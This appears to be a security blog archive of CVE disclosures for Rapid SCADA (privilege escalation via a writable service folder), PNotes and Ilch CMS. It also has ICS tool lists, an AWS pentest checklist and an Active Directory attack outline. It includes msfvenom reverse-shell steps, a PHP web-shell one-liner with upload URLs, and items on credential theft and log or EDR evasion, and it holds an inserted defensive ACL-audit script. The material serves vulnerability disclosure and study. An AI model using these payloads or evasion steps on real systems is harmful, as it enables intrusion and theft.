[CVE-2020-22722] – Rapid SCADA Local Privilege Escalation Vulnerability

Product Owner: Rapid Software LLC

Type:  Installable/Customer-Controlled Application

Application Name: Rapid SCADA 5.8.0

Rapid SCADA is an open source industrial automation platform. The out of the box software provides tools for rapid creation of monitoring and control systems. In case of large implementation, Rapid SCADA is used as a core for development of custom SCADA and MES solutions for a Customer.

Open source is the key to software transparency and security. The licensing model permits creation of new derivative software products.

Rapid SCADA is a perfect choice for creating large distributed industrial automation systems. Rapid SCADA runs on servers, embedded computers and in the cloud. Rapid SCADA nodes exchange information between themselves, and interact with external databases in real time.

The main classes of systems developed using Rapid SCADA are the following:

  •  Industrial automation systems and IIoT systems.
  •  Process control systems.
  •  Energy accounting systems.

Product Url: https://rapidscada.org/

Download Url: https://rapidscada.org/download-all-files/download-rapid-scada/

Application Release Date: 2020-01-28

Severity: High

Authentication: Required

Complexity: Hard

Vulnerability Name: Rapid SCADA Local Privilege Escalation Vulnerability via ScadaAgentSvc.exe, ScadaCommSvc.exe

Vulnerability Explanation: Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

Tested Os: Windows 10 Pro

Vulnerability Details:

During the COVID-19 outbreak, I was testing a lot of open source applications to learn new types of attacks and to help the infosec community gain more awareness. While googling, I landed on Rapid SCADA, which is free and is used by a lot of people.

So I installed the application and started with the basic enumeration process to check whether it had any service-related vulnerabilities.

I took a look at the application's service out of curiosity and found that there is no unquoted service path vulnerability.

ScadaAgentConfig.xml – Default directory location

Rapid Scada 5.8.0 Default installation directory

I had a look at the folder permissions of the “C:\SCADA” folder and, wow, it had been set to “BUILTIN\Users:(OI)(CI)”, which means any user can read, write, execute, create or delete anything inside that folder and its subfolders. The ACL entry carries OI (Object Inherit) and CI (Container Inherit), which means all the files in this folder and its subfolders inherit the same full permissions.

Since “ScadaAgentSvc.exe” is a Windows service executable, planting a malicious program with the same name “ScadaAgentSvc.exe” results in that binary being executed as “NT AUTHORITY\SYSTEM”, the highest privilege in a Windows operating system.

This vulnerability can be used to escalate privileges locally on a Windows system. For example, an attacker can plant a reverse shell from a low-privileged user account; after the computer is restarted, the malicious service is started as “NT AUTHORITY\SYSTEM”, giving the attacker full system access to the remote PC.
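A defender-side check for the condition described above, added here as an example; it is not part of the original advisory and not Rapid SCADA's code. It parses icacls-style directory ACLs, joins them with the binary paths of installed services, and flags any service whose binary lives in a directory that low-privilege principals can write to, either directly or through (CI) inheritance from the nearest parent directory for which an ACL was collected. The service table and the icacls lines are constructed samples; the ScadaAgent/ScadaComm subdirectory layout under C:\SCADA is assumed for the sample, and the parser assumes that domain-qualified principal names contain no spaces apart from the well-known NT AUTHORITY / NT SERVICE authorities.

```python
import ntpath
import re
from typing import Dict, List

# icacls rights that let a principal create, replace or delete files.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D", "DC"}

# Identities every local, low-privilege account holds (compared lower-case).
LOW_PRIV_PRINCIPALS = {
    r"builtin\users",
    r"everyone",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
}

# One access control entry as icacls prints it, e.g. BUILTIN\Users:(OI)(CI)(F).
# Assumption: principals contain no spaces except the well-known authorities.
ACE_RE = re.compile(
    r"(?P<principal>(?:NT AUTHORITY|NT SERVICE|BUILTIN|[A-Za-z0-9._$-]+)"
    r"\\[A-Za-z0-9 ._$-]+|Everyone|CREATOR OWNER)"
    r":(?P<flags>(?:\([A-Z,]*\))+)\s*$"
)
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}

# Constructed sample: service name -> binary path, as you would collect it
# from `Get-CimInstance Win32_Service` (PathName) or `sc qc`.
# The subdirectory layout under C:\SCADA is assumed for the sample.
SAMPLE_SERVICES = {
    "ScadaAgentSvc": r"C:\SCADA\ScadaAgent\ScadaAgentSvc.exe",
    "ScadaCommSvc": r"C:\SCADA\ScadaComm\ScadaCommSvc.exe",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
}

# Constructed sample in the shape of `icacls C:\SCADA /t` output, plus one
# healthy system directory for contrast.
SAMPLE_ICACLS = r"""
C:\SCADA BUILTIN\Users:(OI)(CI)(F)
         NT AUTHORITY\SYSTEM:(OI)(CI)(F)
         BUILTIN\Administrators:(OI)(CI)(F)
C:\SCADA\ScadaAgent BUILTIN\Users:(I)(OI)(CI)(F)
         NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
         BUILTIN\Administrators:(I)(OI)(CI)(F)
C:\Windows\System32 NT AUTHORITY\SYSTEM:(OI)(CI)(F)
         BUILTIN\Administrators:(OI)(CI)(F)
         BUILTIN\Users:(OI)(CI)(RX)
         NT AUTHORITY\Authenticated Users:(OI)(CI)(RX)

Successfully processed 3 files; Failed processing 0 files
"""


def norm(path: str) -> str:
    """Normalise a Windows path for dictionary lookups."""
    return path.rstrip("\\").lower()


def parse_icacls(text: str) -> Dict[str, List[dict]]:
    """Parse icacls output into {path: [ACE, ...]}. The first ACE of each
    object shares its line with the path; further ACEs follow indented."""
    acl: Dict[str, List[dict]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        match = ACE_RE.search(line)
        if not match:
            continue  # blank lines and the "Successfully processed" trailer
        head = line[: match.start()].strip()
        if head:
            current = norm(head)
        if current is None:
            continue
        rights, inherit = set(), set()
        for group in re.findall(r"\(([^)]*)\)", match.group("flags")):
            for token in filter(None, group.split(",")):
                (inherit if token in INHERIT_FLAGS else rights).add(token)
        acl.setdefault(current, []).append(
            {"principal": match.group("principal"), "rights": rights, "inherit": inherit}
        )
    return acl


def weak_aces(aces: List[dict], need_ci: bool) -> List[dict]:
    """ACEs granting a low-privilege principal write access; when the ACE
    comes from a parent directory it must carry (CI) to reach the child."""
    return [
        ace for ace in aces
        if ace["principal"].lower() in LOW_PRIV_PRINCIPALS
        and ace["rights"] & WRITE_RIGHTS
        and (not need_ci or "CI" in ace["inherit"])
    ]


def audit_services(services: Dict[str, str], acl: Dict[str, List[dict]]) -> List[dict]:
    """Flag services whose binary directory (or the nearest parent we hold an
    ACL for) is writable by low-privilege principals."""
    findings = []
    for name, binary in services.items():
        directory, depth = ntpath.dirname(binary), 0
        while True:
            key = norm(directory)
            if key in acl:  # the nearest object with a collected ACL decides
                for ace in weak_aces(acl[key], need_ci=depth > 0):
                    findings.append({
                        "service": name, "binary": binary, "directory": key,
                        "principal": ace["principal"],
                        "ace": "".join(f"({f})" for f in sorted(ace["inherit"] | ace["rights"])),
                    })
                break
            parent = ntpath.dirname(directory)
            if parent == directory:
                break
            directory, depth = parent, depth + 1
    return findings


if __name__ == "__main__":
    for f in audit_services(SAMPLE_SERVICES, parse_icacls(SAMPLE_ICACLS)):
        print(f"{f['service']}: {f['binary']} is replaceable by {f['principal']} "
              f"via {f['directory']} {f['ace']}")
```

On the sample data both SCADA services are reported and the Spooler is not; ScadaCommSvc is caught through the (CI) entry on C:\SCADA even though no ACL was collected for its own subdirectory. The fix the check points at is the usual one: restrict BUILTIN\Users on the install directory to read and execute (icacls with /grant:r) so that only Administrators and SYSTEM can write the service binaries.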

Creating a malicious payload using msfvenom

Transfer to the victim system

Rename the payload EXE to the service EXE's name and replace the service EXE with it

Restart the victim and you will gain shell access:

Note: We gain shell access before the syh4ck user logs into the system.

Syh4ck Normal User Lock screen – after restart

Gaining an admin shell from the user machine

The following video PoC demonstrates how this issue can be used to escalate privileges and gain a remote shell running as “NT AUTHORITY\SYSTEM”.

Rapid SCADA 5.8 local privilege escalation PoC

Vendor Status:

[21.04.2020] Vulnerability discovered.
[21.04.2020] Vendor contacted.

[24.04.2020] Vendor Acknowledged

[25.04.2020] Applied for CVE

[14.08.2020] CVE Assigned – CVE-2020-22722




Email– mr.anandmurugan@gmail.com

Twitter – https://twitter.com/syh4ck

[CVE-2020-22721] – PNotes Insecure .exe File Upload Vulnerability – Code Execution

Product Owner: PNotes – Andrey Gruber © 2007 – 2020

Type:  Installable/Customer-Controlled Application

Application Name: PNotesNET version

Managing your day-to-day life is not an easy job to do. There are so many things for concern – housekeeping, shopping, children… And what about cousin’s birthday that you always forget or important phone numbers? Undoubtedly your working place is covered with dusty yellow (or blue, or pink) sticky notes. If so – PNotes is right for you. Throw the physical stickies away and replace them with virtual ones on your desktop.

PNotes (Pinned Notes or Portable Notes, use what you prefer) exists in two different editions:

  • PNotes – the older one, written entirely in plain C and Windows API (with Pelles C for Windows IDE)
  • PNotes.NET – the newer one, written in C#, requires .NET Framework 4.5

Product Url: https://pnotes-1932d.firebaseapp.com/home

Download Url:  https://sourceforge.net/projects/pnotes/files/PNotes.NET/Bin/PNotesNET3812Setup.exe/download

Application Release Date: 04 May 2019

Severity: High

Authentication: Required

Complexity: Medium

Vulnerability Name: Pnotes Insecure File Upload Vulnerability using (Miscellaneous – External Programs) and arbitrary code execution

Vulnerability Explanation: PNotes is mainly used for taking notes and is a third-party open source application. We can upload a malicious .exe file via Miscellaneous – External Programs and perform code execution via command line access.

PNotes Documentation – about External Programs use

Tested Os: Windows 10 Pro

Vulnerability Details:

Creating a malicious payload using msfvenom

Using msfvenom we create a malicious .exe file to upload

Transfer the malicious implant .exe file – Pnshell.exe – to the victim system:

Pnshell upload in Miscellaneous – External Programs

Uploading the implant .exe file
Click Run to execute the external program – PnotesShell

Code Execution using Pnshell.exe :

Command Line Access:

PNotes reverse shell

Vendor Status:

[18.04.2020] Vulnerability discovered.
[18.04.2020] Vendor contacted.

[19.04.2020] CVE applied

[14.08.2020] CVE Assigned – CVE-2020-22721





Email– mr.anandmurugan@gmail.com


Useful industrial control system security websites & data


  • CSET – The Cyber Security Evaluation Tool (CSET®) assists organizations in protecting their key national cyber assets. This tool provides users with a systematic and repeatable approach for assessing the security posture of their cyber systems and networks. It includes both high-level and detailed questions related to all industrial control and IT systems.
  • Digital Bond’s 3S CoDeSys Tools – Digital Bond created three tools for interacting with PLCs that run CoDeSys, consisting of a command shell, file transfer and an Nmap script.
  • Digital Bond’s ICS Enumeration Tools – Redpoint is a Digital Bond research project to enumerate ICS applications and devices using Nmap extensions. It can be used during assessments to discover ICS devices and pull information that would be helpful in secondary testing. The Redpoint tools use legitimate protocol or application commands to discover and enumerate devices and applications. There is no effort to exploit or crash anything, but be wise and careful.
  • GRASSMARLIN – GRASSMARLIN provides IP network situational awareness of industrial control systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks to support network security. Passively map, and visually display, an ICS/SCADA network topology while safely conducting device discovery, accounting, and reporting on these critical cyber-physical systems.
  • ics_mem_collect – Memory collector for the GE D20MX. The project itself can be extended to work with other devices.
  • ISF – The Industrial Exploitation Framework (ISF) is an exploitation framework similar to Metasploit, written in Python. It is based on the open source RouterSploit tool. It contains exploits for several types of controllers, such as QNX, Siemens and Schneider devices, and includes several scanners.
  • ISEF – The Industrial Security Exploitation Framework (ISEF) is an exploitation framework based on the Equation Group Fuzzbunch toolkit as released by the Shadow Brokers. It is developed by the ICSMASTER Security Team.
  • ꓘamerka GUI – Ultimate Internet of Things/Industrial Control Systems reconnaissance tool.
  • mbtget – Simple Perl script for making Modbus transactions from the command line.
  • MiniCPS – A toolkit for security research on Cyber-Physical Systems from the Singapore University of Technology and Design (SUTD).
  • MODBUS Penetration Testing Framework – smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest the Modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. The framework can be used to perform vulnerability assessments.
  • ModbusPal – ModbusPal is a MODBUS slave simulator. Its purpose is to offer an easy-to-use interface with the capabilities to reproduce complex and realistic MODBUS environments.
  • ModScan – ModScan is a new tool designed to map a SCADA MODBUS TCP based network.
  • NetToPLCSim – TCP/IP network extension for the PLC simulation software Siemens PLCSim.
  • Opendnp3 – Opendnp3 is the de facto reference implementation of IEEE-1815 (DNP3), provided under the Apache License.
  • PLCinject – PLCinject can be used to inject code into PLCs.
  • plcscan – Tool for scanning PLC devices over the S7comm or Modbus protocol.
  • Quickdraw IDS – The Quickdraw IDS project by Digital Bond includes Snort rules for SCADA devices and so-called preprocessors for network traffic. The preprocessors provide significant additional value because of their ability to reconstruct the protocol and state for use by Snort.
  • S7Comm-Analyzer – A plugin for Bro that parses S7comm protocol traffic.
  • SCADAShutdownTool – SCADAShutdownTool is an industrial control system automation and testing tool that allows security researchers and experts to test SCADA security systems, enumerate slave controllers, read controllers’ register values and rewrite register data.
  • sixnet-tools – Tool for exploiting Sixnet RTUs. This simple command line interface allows using undocumented function codes to gain root access and control the underlying Linux OS on certain Sixnet family industrial control devices.
  • Snap7 – Snap7 is an open source, 32/64-bit, multi-platform Ethernet communication suite for interfacing natively with Siemens S7 PLCs. The new CPUs 1200/1500, the old S7-200, the small LOGO 0BA7/0BA8 and SINAMICS drives are also partially supported.
  • s7scan – A tool written in Python that scans networks, enumerates Siemens PLCs and gathers basic information about them, such as PLC firmware and hardware version, network configuration and security parameters.
  • S7 Password Bruteforcer – A tool to brute-force the password used by S7 instances from a PCAP using a dictionary. Originally created by SCADAStrangelove.
  • splonebox – splonebox is an open source network assessment tool with a focus on modularity. It offers an ongoing analysis of a network and its devices. One major design decision features development of custom plugins, including ones for industrial communication protocols.
  • Wireshark – Wireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions. It has support for many protocols used in ICS.


  • Moki Linux – Moki is a modification of Kali to incorporate various ICS/SCADA tools scattered around the internet, to create a customized Kali Linux geared towards ICS/SCADA pentesting professionals.
  • SamuraiSTFU – SamuraiSTFU takes the best-in-breed security tools for traditional network and web penetration testing, adds specialized tools for embedded and RF testing, and mixes in a healthy dose of energy sector context, documentation, and sample files, including emulators for SCADA, smart meters, and other types of energy sector systems, to provide a full test lab.
  • ControlThings Platform – The ControlThings Platform is an open source Linux distribution for ICS cyber security teams. It takes the best-in-breed security assessment tools for traditional IT infrastructures and adds specialized tools for embedded electronics, proprietary wireless, and a healthy dose of ICS-specific assessment tools, both from the community and custom tools created by the ControlThings I/O teams.


  • Conpot – Conpot is a low-interaction server-side Industrial Control Systems honeypot designed to be easy to deploy, modify and extend. It features easy customization and behaviour mimicking, amongst others, and can be extended with real HMIs. Built and maintained under the Honeynet Project.
  • GasPot – GasPot is a honeypot that has been designed to simulate a Veeder-Root Guardian AST. These tank gauges are common in the oil and gas industry for gas station tanks to help with inventory of fuels. GasPot was designed to randomize as much as possible so no two instances look exactly the same.
  • T-Pot – T-Pot is a combination of several honeypots that run in Docker containers. Suricata and the ELK stack are used for security monitoring and visualization. Amongst others, it features Conpot and eMobility, which are ICS and next-generation transport infrastructure honeypots.


  • 4SICS ICS Lab PCAPs – The “Geek Lounge” at 4SICS contains an ICS lab with PLCs, RTUs, servers and industrial network equipment (switches, firewalls, etc.). These devices are available for hands-on “testing” by 4SICS attendees, and traffic has been captured from them.
  • DEF CON 23 ICS Village PCAPs – PCAPs from the 23rd DEF CON.
  • ICS Map – A map created from data gathered by Shodan showing ICS devices. Data is made available for further analysis.
  • ICS PCAP Collection by Jason Smith – A collection of PCAPs for various ICS utilities and protocols.
  • ICS Radar – Data gathered from several types of ICS protocols by Shodan, visualized on a globe.
  • S4x15 ICS Village – Mirror for the PCAPs from the S4x15 CTF as used during the contest.
  • S7 PCAP samples – Sample files for the Wireshark S7 protocol dissector plugin.
  • SCADAPASS – The famous SCADA StrangeLove default/hardcoded passwords list.
  • TRISIS/TRITON/HATMAN malware repository – Repository containing original and decompiled files of the TRISIS/TRITON/HATMAN malware targeting Triconex Safety Instrumented System (SIS) controllers.

Feeds and News

  • ICS-CERT Alerts – The ICS-CERT Alert feed is intended to provide timely notification to critical infrastructure owners and operators concerning threats or activity with the potential to impact critical infrastructure computing networks.
  • ICS-CERT RSS Feed – The RSS feed by the United States ICS-CERT lists news and newly released vulnerability advisories.
  • Industrial Security Alerts – Siemens provides alerts for its industrial systems via this page and RSS feed.
  • North American Electric Reliability Corporation (NERC) Alerts – NERC provides alerts for Bulk Electric System (BES) security advisories and industry recommendations.
  • ABB Cybersecurity Alerts and Notifications – ABB provides alerts for its cyber security incidents and software vulnerabilities.
  • Schneider Electric Cybersecurity Alerts and Notifications – Get the latest updates and alerts on cyber security and compliance from Schneider Electric Software.

Conferences and Conference Material

  • CS3STHLM – The Stockholm international summit on Cyber Security in SCADA and Industrial Control Systems is an annual summit that gathers the most important stakeholders across critical processes and industries. CS3STHLM has been organized since 2014, and has quickly become the premier ICS Security Summit in Northern Europe.
  • CS4CA – Cyber Security for Critical Assets is a global series of summits focusing on cyber security for critical infrastructure.
  • SANS ICS Summit Archives – Central repository for the presentation material for the SANS ICS Summits held worldwide.
  • SANS ICS Cybersecurity Conference (WeissCon) – Affectionately known as WeissCon after its founder Joe Weiss, the conference is now owned and operated by SecurityWeek and usually runs in October at different locations each year in the US.


  • ATT&CK® for Industrial Control Systems by MITRE – ATT&CK for ICS is a knowledge base useful for describing the actions an adversary may take while operating within an ICS network.
  • Library of Resources for Industrial Control System Cyber Security – SCADAhacker.com’s ultimate list of ICS/SCADA cybersecurity resources.
  • Applied Cyber Security and the Smart Grid – Applied Cyber Security and the Smart Grid: Implementing Security Controls into the Modern Power Infrastructure by Eric D. Knapp and Raj Samani.
  • A Collection of Resources for Getting Started in ICS/SCADA Cybersecurity – Robert M. Lee’s thoughts on some good resources on ICS & SCADA security.
  • Hacker Machine Interface – The State of SCADA HMI Vulnerabilities – A TrendLabs research paper from the Trend Micro Zero Day Initiative team about the current state of SCADA and HMI security.
  • Handbook of SCADA/Control Systems Security – This comprehensive handbook covers fundamental security concepts, methodologies, and relevant information pertaining to supervisory control and data acquisition (SCADA) and other industrial control systems used in utility and industrial facilities worldwide.
  • SCADA Cybersecurity Framework – Paper describing what a SCADA cyber security framework should consist of.
  • Industrial Network Security, Second Edition – Industrial Network Security, Second Edition: Securing Critical Infrastructure Networks for Smart Grid, SCADA, and Other Industrial Control Systems by Eric D. Knapp and Joel Thomas Langill.
  • Power System SCADA and Smart Grids – The book brings together in one concise volume the fundamentals and possible application functions of power system supervisory control and data acquisition (SCADA). Not security-oriented and geared towards power systems, but a good primer into SCADA nonetheless.
  • NIST SP 800-82, Revision 2 – Guide to Industrial Control Systems (ICS) Security by NIST.
  • The Industrial Control System Cyber Kill Chain – This SANS paper describes the ICS Cyber Kill Chain. It tailors the Lockheed Martin Kill Chain to typical, two-phase attacks on ICS systems.
  • An Abbreviated History of Automation, Industrial Control Systems, and Cybersecurity – This SANS paper looks at the background of ICS cybersecurity. Well worth the read to make sure you understand many of the events that have occurred over the past twenty years and how they’ve inspired security in ICS today.
  • Control Engineering – Networking and Security – CyberSecurity – Control Engineering magazine’s cybersecurity news and literature.
  • Operational Technology Cyber Security Incidents Ontology (OT-CSIO) – OT-CSIO, created by FireEye, is an ontology to understand, cross-compare and assess cyber security incidents related to operational technology. It provides guidance for assessing risks and helps in making informed decisions.
  • CIS Controls Implementation Guide for Industrial Control Systems – Version 7 – This document provides guidance on how to apply the security best practices found in CIS Controls Version 7.1 to ICS environments.
  • CIS Controls Internet of Things Companion Guide – Version 7.1 – The objective of this document is to have broad applicability across sectors. IoT affects all areas of computing across multiple sectors, such as healthcare, aviation, public safety, and energy. This has led to sector-specific IoT security guidance, but this document is purposefully sector-agnostic.


  • LICSTER – LICSTER, the Low-cost ICS Security Testbed for Education and Research, aims to help set up a minimal, low-cost Industrial Control System (ICS) testbed for students, researchers, or anyone with an interest in industrial security. The project contains a list of affordable hardware to build the minimalistic ICS with, instructions, configurations and installation scripts to instantiate the system, as well as various attacker scenarios and their implications. The paper can be found here.

Introduction to ICS, SCADA, & PLCs

  • PLC Training Org – Site organizes all essential topics related to PLC training up to SCADA systems. While security is interwoven within the 10 learning phases, this is a great security article on the site for those just starting out.
  • Control System Basics – YouTube video explaining control system basics, including the type of logic these systems use to sense and create physical changes to take action upon.
  • SCADA Systems – Utility 101 Session with Rusty Williams – Utility industry professional Rusty Williams explains SCADA from an electric utility perspective.
  • Control System Lectures – Brian Douglas’ YouTube video series where he covers a wide range of topics on control systems in a very easy-to-process way.
  • The PLC Professor – The PLC Professor and his website plcprofessor.com contain a lot of great resources for learning what programmable logic controllers (PLCs) and other types of control systems and their logic are and how they work.
  • Serial Communications RS232 and RS485 – John Rinaldi of Real Time Automation describes serial communications RS232 and RS485.
  • All You Need To Know About MODBUS-RTU – John Rinaldi of Real Time Automation describes MODBUS-RTU.
  • MODBUS Data Structures – John Rinaldi of Real Time Automation describes MODBUS data structures.
  • All You Need to Know About MODBUS-TCP – John Rinaldi of Real Time Automation describes MODBUS-TCP.
  • How Ethernet TCP/IP is Used by Industrial Protocols – John Rinaldi of Real Time Automation describes Ethernet TCP/IP.
  • GRFICS – Graphical Realism Framework for Industrial Control Simulations (GRFICS) is a framework for realistic industrial control simulations that uses the Unity 3D game engine for simulating industrial control systems. GRFICS provides users with a full virtual industrial control system (ICS) network to practice common attacks including command injection, man-in-the-middle, and buffer overflows, and visually see the impact of their attacks in the 3D visualization. Users can also practice their defensive skills by properly segmenting the network with strong firewall rules, or writing intrusion detection rules.
  • RealPars – The RealPars YouTube channel has many videos on industrial automation and PLC programming.

AWS Cloud Penetration Testing Test Cases

  • Test for unauthenticated bucket access
  • Test for semi-public bucket access – improper ACL permissions
  • Targeting and compromising AWS access keys in git commits
  • Test for extracting keys from an EC2 instance
  • Exploiting AWS security misconfigurations
  • Testing to exploit an EC2 instance
  • Exploiting internal AWS services using Lambda backdoors
  • Test for subdomain takeover
  • Testing for AWS IAM privilege escalation
  • Test for RCE attack
  • Test for AWS role enumeration (IAM)
  • Test for EC2 service to exploit privilege escalation
  • Test for AWS IAM enumeration: bypassing CloudTrail logging
  • Test for Bitbucket Server data for credentials in AWS
  • DNS rebinding to compromise the cloud environment
  • Test for change of local Windows / Linux logs
  • Test to create jobs or serverless actions to add root certificates and SSH private keys to machines and users (such as AWS Lambda)
  • Test to create an additional interface / assign an IP address in the target network / subnet on a compromised machine (like assigning a secondary private IPv4 address or interface to an AWS EC2 instance)
  • Steal virtual machine images from storage accounts, analyze them for passwords, keys and certificates to access live systems (like VM VHD snapshots from storage accounts)
  • Test to gain OS-level access to instances/VMs via workload management service privileges (AWS SSM)
  • Create systems management commands or abuse instance metadata for scheduled and triggered command and control (AWS Systems Manager, modify EC2 User Data to trigger a reverse shell)
  • Test to run or deploy a workload with an assigned/passed service or role, export instance credentials for those privileges (such as EC2 passed role and metadata credentials)
  • Fingerprint server and application versions and frameworks, detect sensitive PII in application logs
  • Test for CSV injection in AWS CloudTrail
  • Test for AWS secrets accessible via metadata
  • Attempt load balancer MITM for session hijacking (ELB) by cloud service configuration or load balancer instance compromise
  • Steal credentials from metadata of proxy or HTTP forwarding servers (credentials in AWS metadata)
  • Steal cloud workload credentials (AWS metadata STS or Azure Linux Agent (waagent) folder credentials)
  • Steal credentials from or leverage privilege to operate a cloud key service (AWS KMS, Azure Key Vault)
  • Alter data in a datastore for fraudulent transactions or static website compromise (S3, RDS, Redshift)
  • Alter a serverless function, logic app or other business logic implementation for action on objective or escalation (AWS Lambda or Azure Logic Apps)
  • Alter data in local SQL or MySQL databases
  • Operate in regions where logging is not enabled or disable global logging (like CloudTrail)
  • Alter log files in a non-validated log store or disable validation (like CloudTrail log validation)
  • Test for disabling network traffic analysis / logging (VPC Flow Logs)
  • Test for disabling cloud alerting to prevent detection and response (like CloudWatch alerts, GuardDuty, Security Hub, or Azure Security Center)
  • Test for disabling data store access logging to prevent detection and response (CloudTrail data access, S3 access logging, Redshift user activity)
  • Alter log retention or damage the integrity of logs (S3 lifecycle, KMS decryption CMK key deletion/role privilege lockout)
  • Process hooking, process injection, Windows access token manipulation, leveraging misconfigured sudo capabilities
  • Test to create or reset a login, access key or temporary credential belonging to a high-privilege user (like iam:CreateAccessKey, STS or iam:UpdateLoginProfile)
  • Test to change the default policy for a user or new users to include additional privileges (like set-default-policy-version)

Active Directory Kill Chain Attack 101

Attacking Active Directory using modern post-exploitation adversary tradecraft


SPN Scanning

Data Mining

User Hunting




Active Directory Federation Services

Privilege Escalation

Passwords in SYSVOL & Group Policy Preferences

MS14-068 Kerberos Vulnerability


Kerberos Delegation

Unconstrained Delegation

Constrained Delegation

Resource-Based Constrained Delegation

Insecure Group Policy Object Permission Rights

Insecure ACLs Permission Rights

Domain Trusts



Microsoft SQL Server

Red Forest



Lateral Movement

Microsoft SQL Server Database links

Pass The Hash

System Center Configuration Manager (SCCM)


Password Spraying

Automated Lateral Movement

Defense Evasion

In-Memory Evasion

Endpoint Detection and Response (EDR) Evasion


Microsoft ATA & ATP Evasion

PowerShell ScriptBlock Logging Bypass

PowerShell Anti-Malware Scan Interface (AMSI) Bypass

Loading .NET Assemblies Anti-Malware Scan Interface (AMSI) Bypass

AppLocker & Device Guard Bypass

Sysmon Evasion

HoneyTokens Evasion

Disabling Security Tools

Credential Dumping

NTDS.DIT Password Extraction

SAM (Security Accounts Manager)


Kerberos AP-REP Roasting

Windows Credential Manager/Vault


LLMNR/NBT-NS Poisoning



Golden Ticket

SID History

Silver Ticket



Group Policy Object

Skeleton Keys


Security Support Provider

Directory Services Restore Mode

ACLs & Security Descriptors

Tools & Scripts

  • PowerView – Situational Awareness PowerShell framework
  • BloodHound – Six Degrees of Domain Admin
  • Impacket – Impacket is a collection of Python classes for working with network protocols
  • aclpwn.py – Active Directory ACL exploitation with BloodHound
  • CrackMapExec – A swiss army knife for pentesting networks
  • ADACLScanner – A tool with a GUI or command line used to create reports of discretionary access control lists (DACLs) and system access control lists (SACLs) in Active Directory
  • zBang – zBang is a risk assessment tool that detects potential privileged account threats
  • SafetyKatz – SafetyKatz is a combination of slightly modified version of @gentilkiwi’s Mimikatz project and @subTee’s .NET PE Loader.
  • SharpDump – SharpDump is a C# port of PowerSploit’s Out-Minidump.ps1 functionality.
  • PowerUpSQL – A PowerShell Toolkit for Attacking SQL Server
  • Rubeus – Rubeus is a C# toolset for raw Kerberos interaction and abuses
  • ADRecon – A tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment
  • Mimikatz – Utility to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory, and also to perform pass-the-hash and pass-the-ticket or build Golden Tickets
  • Grouper – A PowerShell script for helping to find vulnerable settings in AD Group Policy.
  • Powermad – PowerShell MachineAccountQuota and DNS exploit tools
  • RACE – RACE is a PowerShell module for executing ACL attacks against Windows targets.
  • DomainPasswordSpray – DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.
  • MailSniper – MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.)
  • LAPSToolkit – Tool to audit and attack LAPS environments.
  • CredDefense – Credential and Red Teaming Defense for Windows Environments


Cheat Sheets

Other Resources

[CVE-2019-17046] – Ilch Content Management System v2.1.22 Insecure File Upload, LFI & Remote Code Execution – Critical Vulnerability Disclosure

Product Owner: Ilch – Content Management System

CVE ID – CVE-2019-17046 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17046 )

Type:  Installable/Customer-Controlled Application

Application Name: ilchCMS 2.1.22

Severity: Critical

Authentication: Required

Complexity: Complex

Vulnerability Name: Insecure File upload and Local file inclusion to remote code execution – Ilch CMS Admin Modules

Vulnerability Explanation: 

Browsers Verified In:

Firefox 68.0.2 (64-bit)


Local File Inclusion, aka LFI, is one of the most common web application vulnerabilities. If exploited successfully, it might allow attackers to read sensitive information, access configuration files or even execute system commands remotely.

An application is vulnerable every time a developer uses an include function with user-provided input without validating it. An attacker could easily exploit such a mistake. The main goals of the attacker would be:

  • An in depth information gathering (user enumeration, sensitive files, credentials and more).
  • A reverse shell to the target machine.

Log Poisoning:

Log poisoning is a common technique used to gain a reverse shell from an LFI vulnerability. To make it work, an attacker attempts to inject malicious input into the server log.

As the PHP statement “include” also evaluates the input, an included malformed file would be evaluated too. If we control the contents of a file available on the vulnerable web application, we could insert PHP code and load the file through the LFI vulnerability to execute our code. Such injections are typically made through the server log files, such as the Apache error log, the access log and others.

Php info:

As shown, we were able to load the PHPInfo file, meaning that our code was executed. Let’s now attempt to execute the proper commands and receive a reverse shell from the target machine.

The following PHP one-liner payload executes system commands:

<?php echo shell_exec($_GET[‘e’].’ 2>&1′); ?>

LFI: Local File Inclusion using insecure file upload

Insecure file upload – the Media module lets an administrator add the .php extension to the allowed file list (Media module -> settings -> Allowed File -> php):

url: http://localhost/cms/Ilch-v2.1.22/index.php/admin/media/settings/index

After uploading the one-liner through the Media module, it is executed directly from the upload directory:

url: http://localhost/cms/Ilch-v2.1.22/application/modules/media/static/upload/5d9122c079bc3testshell.php?e=whoami

url: http://localhost/cms/Ilch-v2.1.22/application/modules/media/static/upload/5d9122c079bc3testshell.php?e=ipconfig

Reverse shell:

Using a netcat listener we can catch a reverse shell from the uploaded PHP.

Reverse shell payload used:

Payload – https://github.com/Dhayalanb/windows-php-reverse-shell.git

Remote Code Execution: Remote code execution is an attacker's ability to run code of their choosing on someone else's computing device and make changes to it, regardless of where the device is geographically located.

Listening on port 1234 with netcat, we can see that an Admin shell has been received.

Affected url :

InSecure File to LFI to RCE – Ilch CMS – V 2.1.22

Twitter – https://twitter.com/the_pr0fess0r_

NickName: 4n4nd

[CVE-2019-17045] Ilch – Content Management System V – 2.1.22 Vulnerability disclosure

Product Owner: Ilch – Content Management System

CVE ID: CVE-2019-17045 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17045 )

Type:  Installable/Customer-Controlled Application

Application Name: ilchCMS – 2.1.22 02/01/22

Application Release Date: 23.05.2019

Severity: High

Authentication: Required

Complexity: Easy

